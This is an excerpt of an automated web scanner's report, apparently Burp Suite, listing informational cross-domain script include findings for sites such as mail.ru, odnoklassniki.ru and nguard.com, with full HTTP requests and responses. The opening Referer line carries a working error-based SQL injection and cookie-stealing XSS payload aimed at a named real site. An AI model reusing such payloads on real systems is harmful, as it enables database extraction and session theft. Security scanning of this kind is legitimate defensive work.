Referer: http://learn.shavlik.com/shavlik/index.cfm?m=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2C(SELECT%20@@VERSION)%2CCHAR(95)%2CCHAR(33)%2CCHAR(64))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))29f68%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E8c4ff1d7709&pg=697&h=0&hp=697&utm_term=vulnerability%20management&utm_campaign=PatchManagement&utm_mt=e&gclid=CPC_jKTPt6gCFUh-5QodsROzEA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=799534; CFTOKEN=57697702; __utmz=225610631.1303732848.1.1.utmgclid=CPC_jKTPt6gCFUh-5QodsROzEA|utmccn=PatchManagement|utmcmd=(not%20set)|utmctr=vulnerability%20management; __utma=225610631.313706594.1303732848.1303732848.1303732848.1; __utmc=225610631; __utmb=225610631.8.10.1303732848

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Mon, 25 Apr 2011 12:45:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.9-2
X-Pingback: http://www.oppsource.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 12:45:36 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

   <script language = "javascript">
       window.location = 'http://learn.shavlik.com/shavlik/';
   </script>
   <script language = "javascript">
       window.location = 'http://learn.shavlik.com/shavlik/
...[SNIP]...
<link rel='stylesheet' id='A2A_SHARE_SAVE-css' href='http://www.oppsource.com/wp-content/plugins/add-to-any/addtoany.min.css?ver=1.3' type='text/css' media='all' />
<script type='text/javascript' src='http://www.oppsource.com/wp-includes/js/jquery/jquery.js?ver=1.4.2'></script>
<script type='text/javascript' src='http://www.oppsource.com/wp-content/plugins/google-analyticator/external-tracking.min.js?ver=6.1.1'></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www.oppsource.com/wp-content/themes/oppsource3/style/superfish.css" media="screen">
<script type="text/javascript" src="http://www.oppsource.com/wp-content/themes/oppsource3/script/jquery.js"></script>
<script type="text/javascript" src="http://www.oppsource.com/wp-content/themes/oppsource3/script/hoverIntent.js"></script>
<script type="text/javascript" src="http://www.oppsource.com/wp-content/themes/oppsource3/script/superfish.js"></script>
...[SNIP]...
24.18. http://mail.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mail.ru
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: mail.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:24:37 GMT
Server: Apache/1.3.27 (Unix) mru_xml/0.471 gorgona/2.1 mod_jk/1.2.4 mod_ruby/1.0.7 Ruby/1.6.8 mod_mrim/0.17
Connection: close
Set-Cookie: Mpopl=721425857; expires=Mon, 25 Apr 2011 14:39:37 GMT; path=/; domain=.mail.ru
Set-Cookie: mrcu=D5824DB584250497422EF3D6C1AD; expires=Thu, 22 Apr 2021 14:24:37 GMT; path=/; domain=.mail.ru
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Sun, 25 Apr 2010 14:24:37 GMT
Last-Modified: Mon, 25 Apr 2011 18:24:37 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 114440


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru" lang="ru">
<head
...[SNIP]...
<link href="http://limg.imgsmail.ru/mail/ru/css/go_search.css?16" rel="stylesheet" type=text/css>
<script language="javascript" src="http://limg.imgsmail.ru/r/js/splash.js?7" type="text/javascript" charset="windows-1251"></script>
...[SNIP]...
</script>


<script language="javascript" src="http://limg.imgsmail.ru/r/js/blogs/tooltiplib.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script language="javascript" src="http://limg.imgsmail.ru/r/js/blogs/tooltiplib.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script src="https://auth.mail.ru/https.js?1464913075" type="text/javascript" language="javascript"></script>
...[SNIP]...
24.19. http://nguard.com/about.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nguard.com
Path:   /about.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about.aspx HTTP/1.1
Host: nguard.com
Proxy-Connection: keep-alive
Referer: http://nguard.com/vulnerability-assessment/?gclid=CM2C9p3Pt6gCFUOo4AoduRviBQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=74935565.1303735966.2.2.utmgclid=CM2C9p3Pt6gCFUOo4AoduRviBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=74935565.1810353086.1303732835.1303732835.1303735966.2; __utmc=74935565; __utmb=74935565.1.10.1303735966

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:09:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17091


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!-- InstanceBegin codeOutsi
...[SNIP]...
</script> -->
<script src="http://maps.google.com/maps?file=api&amp;v=2&amp;key=ABQIAAAAp8z1VNE38srOQ1o5fXDRARSx6ctTO5fMIZE3YB6iT47nOM1iYBROmuKbl_gd95IJK_VjcpR2iBGfSw" type="text/javascript"></script>
...[SNIP]...
24.20. http://nguard.com/contact.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nguard.com
Path:   /contact.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /contact.aspx HTTP/1.1
Host: nguard.com
Proxy-Connection: keep-alive
Referer: http://nguard.com/about.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=74935565.1303735966.2.2.utmgclid=CM2C9p3Pt6gCFUOo4AoduRviBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=74935565.1810353086.1303732835.1303732835.1303735966.2; __utmc=74935565; __utmb=74935565.2.10.1303735966

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:09:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12825


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!-- InstanceBegin codeOutsi
...[SNIP]...
</script> -->
<script src="http://maps.google.com/maps?file=api&amp;v=2&amp;key=ABQIAAAAp8z1VNE38srOQ1o5fXDRARSx6ctTO5fMIZE3YB6iT47nOM1iYBROmuKbl_gd95IJK_VjcpR2iBGfSw" type="text/javascript"></script>
...[SNIP]...
24.21. http://nguard.com/vulnerability-assessment/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nguard.com
Path:   /vulnerability-assessment/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /vulnerability-assessment/?gclid=CM2C9p3Pt6gCFUOo4AoduRviBQ HTTP/1.1
Host: nguard.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=74935565.1303732835.1.1.utmgclid=CM2C9p3Pt6gCFUOo4AoduRviBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=74935565.1810353086.1303732835.1303732835.1303732835.1; __utmc=74935565

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:52:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 19622


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...
24.22. http://odnoklassniki.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odnoklassniki.ru
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: odnoklassniki.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: CHECK_COOKIE=true; Domain=.odnoklassniki.ru; Expires=Mon, 25-Apr-2011 14:27:36 GMT; Path=/
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Rendered-Blocks: HtmlPage
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 14:26:36 GMT
Content-Length: 13753

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head><title>..........................</title>
<meta http-equiv="Content-Type" con
...[SNIP]...
<div class="hook"><script src="http://stg.odnoklassniki.ru/res/js/flashdetect.js" type="text/javascript" onload="try{ document.getElementById('field_flashVer').value=GetSwfVer();} catch(e) {}"></script>
...[SNIP]...
24.23. http://pda.loveplanet.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pda.loveplanet.ru
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: pda.loveplanet.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:51:44 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: domhit=1; path=/; expires=Mon, 02-May-2011 14:51:44 GMT; domain=.pda.loveplanet.ru
Set-Cookie: affiliate_reff=http%3A%2F%2Fmy.webalta.ru%2F; path=/; expires=Tue, 24-Apr-2012 14:51:44 GMT; domain=.pda.loveplanet.ru
Set-Cookie: randomhit=1698142961; path=/; expires=Tue, 24-Apr-2012 14:51:44 GMT; domain=.pda.loveplanet.ru
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 25 Apr 2011 14:51:44 GMT
Content-Length: 11125

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<title>.................... LovePlanet.ru. .......... .............. .. .........
...[SNIP]...
<link href="http://css.loveplanet.ru/3/img/pda/main.css" rel="stylesheet" type="text/css">
<script src='http://css.loveplanet.ru/3/img/pda/main.js' type='text/javascript'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://css.loveplanet.ru/3/imgstc/xgemius/xgemius.js"></script>
...[SNIP]...
24.24. http://pixel.fetchback.com/serve/fb/pdc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /serve/fb/pdc?cat=&name=landing&sid=719 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/page_not_found.shtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1303742441_10164:0_10638:0_10640:0_10641:0_1437:0_1660:562769; uid=1_1303742441_1303179323923:6792170478871670; kwd=1_1303742441_11317:0_11717:0_11718:0_11719:0; sit=1_1303742441_719:0:0_2451:50869:45769_3236:208832:208714_782:563118:562769; cre=1_1303742441; bpd=1_1303742441; apd=1_1303742441; scg=1_1303742441; ppd=1_1303742441; afl=1_1303742441

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:41:11 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1303742471_10164:0_10638:0_10640:0_10641:0_1437:0_1660:562799; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: uid=1_1303742471_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: kwd=1_1303742471_11317:0_11717:0_11718:0_11719:0; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: sit=1_1303742471_719:30:0_2451:50899:45799_3236:208862:208744_782:563148:562799; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: cre=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: bpd=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: apd=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: scg=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: ppd=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: afl=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 25 Apr 2011 14:41:11 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4418

<!-- campaign #1437 is eligible -->
<![if !IE 6]>
<script language='javascript' type='text/javascript'>
function timeout(){location.replace('http://pixel.fetchback.com/timeout.html');}
setTimeout(time
...[SNIP]...
<!-- "Net Suite" c/o "FetchBack", segment: 'Net Suite Retargeting' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=6551&partnerID=91&clientID=1838&key=segment&returnType=js"></script>
...[SNIP]...
<!-- "NetSuite AU" c/o "FetchBack", segment: 'NetSuiteAU Retargeting' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=13893&partnerID=91&clientID=2693&key=segment&returnType=js"></script>
...[SNIP]...
<!-- "NetSuite Singapore" c/o "FetchBack", segment: 'NetSuite Sing Retargeting' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=13899&partnerID=91&clientID=2695&key=segment&returnType=js"></script>
...[SNIP]...
<!-- "NetSuite UK" c/o "FetchBack", segment: 'NetSuite UK Retargeting' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=13896&partnerID=91&clientID=2694&key=segment&returnType=js"></script>
...[SNIP]...
<!-- "NetSuite HonKong" c/o "FetchBack", segment: 'NetSuite HonKong Retargeting' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=13902&partnerID=91&clientID=2696&key=segment&returnType=js"></script>
...[SNIP]...
24.25. http://player.vimeo.com/video/22043447  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://player.vimeo.com
Path:   /video/22043447

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /video/22043447?title=0&byline=0&portrait=0&color=2f85be HTTP/1.1
Host: player.vimeo.com
Proxy-Connection: keep-alive
Referer: http://www.customermagnetism.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=256147786.1303575918.2.2.utmcsr=sailinganarchy.com|utmccn=(referral)|utmcmd=referral|utmcct=/index_page1.php; __utma=256147786.658057560.1303432520.1303432520.1303575918.2

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:03:32 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
X-Server: 10.90.6.246
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Expires: Fri, 25 Feb 1983 09:30:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 7111

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Untitled</title><!--[if lt IE 9]><style>.a.d .ab {display: block;}.a.d .bh {background: #000;filter: alpha(opacity='70');}</style><![e
...[SNIP]...
<link rel="stylesheet" href="http://a.vimeocdn.com/p/1.2.2/css/player.core.opt.css?621ff"><script src="http://a.vimeocdn.com/p/1.2.2/js/player.core.opt.js?621ff"></script>
...[SNIP]...
24.26. http://pogoda.webalta.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pogoda.webalta.ru
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: pogoda.webalta.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.2.10.1303741218

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:20:55 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: pogoda_reg=10290; expires=Tue, 24-Apr-2012 14:20:55 GMT; path=/; domain=.webalta.ru
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>............ ...
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/public/css/style-weather.css?v1">
   <script language="JavaScript" type="text/javascript" src="http://img.webalta.ru/public/js/webalta.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</div>
<script src="//mc.yandex.ru/metrika/watch.js" type="text/javascript" defer="defer"></script>
...[SNIP]...
24.27. http://pretty.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pretty.ru
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: pretty.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:24:33 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: domhit=1; path=/; expires=Mon, 02-May-2011 14:24:33 GMT; domain=.pretty.ru
Set-Cookie: affiliate_reff=; path=/; expires=Thu, 01-Jan-1972 03:00:00 GMT; domain=.pretty.ru
Set-Cookie: randomhit=1511529011; path=/; expires=Tue, 24-Apr-2012 14:24:33 GMT; domain=.pretty.ru
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 25 Apr 2011 14:24:33 GMT
Content-Length: 59765

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8
...[SNIP]...
<link href="http://css.loveplanet.ru/3/img/07_purple/v1/v1.css" rel="stylesheet" type="text/css">

<script src="http://css.loveplanet.ru/3/img/07_purple/main.js" type="text/javascript"></script>
<script src="http://css.loveplanet.ru/3/img/07_purple/v1/v1.js" type="text/javascript"></script>
<script type="text/javascript" src="http://css.loveplanet.ru/3/imgstc/swfobject.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://css.loveplanet.ru/3/imgstc/fw_slideshow2.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://css.loveplanet.ru/3/imgstc/popup2d.js"></script>
...[SNIP]...
<td class="bann_2"><script src="http://fotocash.ru/static/js/swfobject.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://css.loveplanet.ru/3/imgstc/xgemius/xgemius.js"></script>
...[SNIP]...
24.28. http://shopping.netsuite.com/s.nl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shopping.netsuite.com
Path:   /s.nl

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /s.nl?c=438708&sc=3&whence=&qtyadd=1&n=1&mboxSession=1303736347554-914602&ext=T&Submit.x=43&productId=1650&Submit.y=8 HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=dYyfN1wHZN71TmqdTHVPc5rfpmdrpWWkqQGJBTWHYGvFy6PP4kwCF9spppQp2p6T1y9LcTBvdSVRJT4zdGg0FbSwpQwRl5vyB94JHShTwbxX21bQLM8ycnhGDnyFQxbh!-2139436563; NLVisitorId=rcHW8415AZeYvnmq; NLShopperId=rcHW8415AciYvvMS; NS_VER=2011.1.0; NLPromocode=438708_; promocode=

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:59:58 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 677005915:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 54139


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>


<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...
00&amp;bgbutton=F2F4F6&amp;bgrequiredfld=ffffff&amp;font=Arial%2CHelvetica%2Csans-serif&amp;size_site_content=10pt&amp;size_site_title=10pt&amp;size=1.0&amp;nlinputstyles=T&amp;NS_VER=2011.1.0&amp;3'>
<script type="text/javascript" src="https://secure.eset.com/us/store/geoIpRedirect"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.1.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->

<script type="text/javascript" src="https://secure.eset.com/us/scripts/lib/s_code3.js"></script>
...[SNIP]...
24.29. http://solutions.kronos.com/forms/experience2011  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://solutions.kronos.com
Path:   /forms/experience2011

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /forms/experience2011 HTTP/1.1
Host: solutions.kronos.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1303738433760-48782#1303742829|check#true#1303741029; s_cc=true; s_nr=1303741346229; s_invisit=true; s_lv=1303741346233; s_lv_s=First%20Visit; s_gpv_page=kronos; s_sq=kronos-dev%3D%2526pid%253Dkronos%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kronos.com%25252Fexperience2011%2526ot%253DA; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.10.10.1303738437

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Mon, 25 Apr 2011 14:59:53 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Last-Modfied: Mon, 25 Apr 2011 10:54:53 GMT
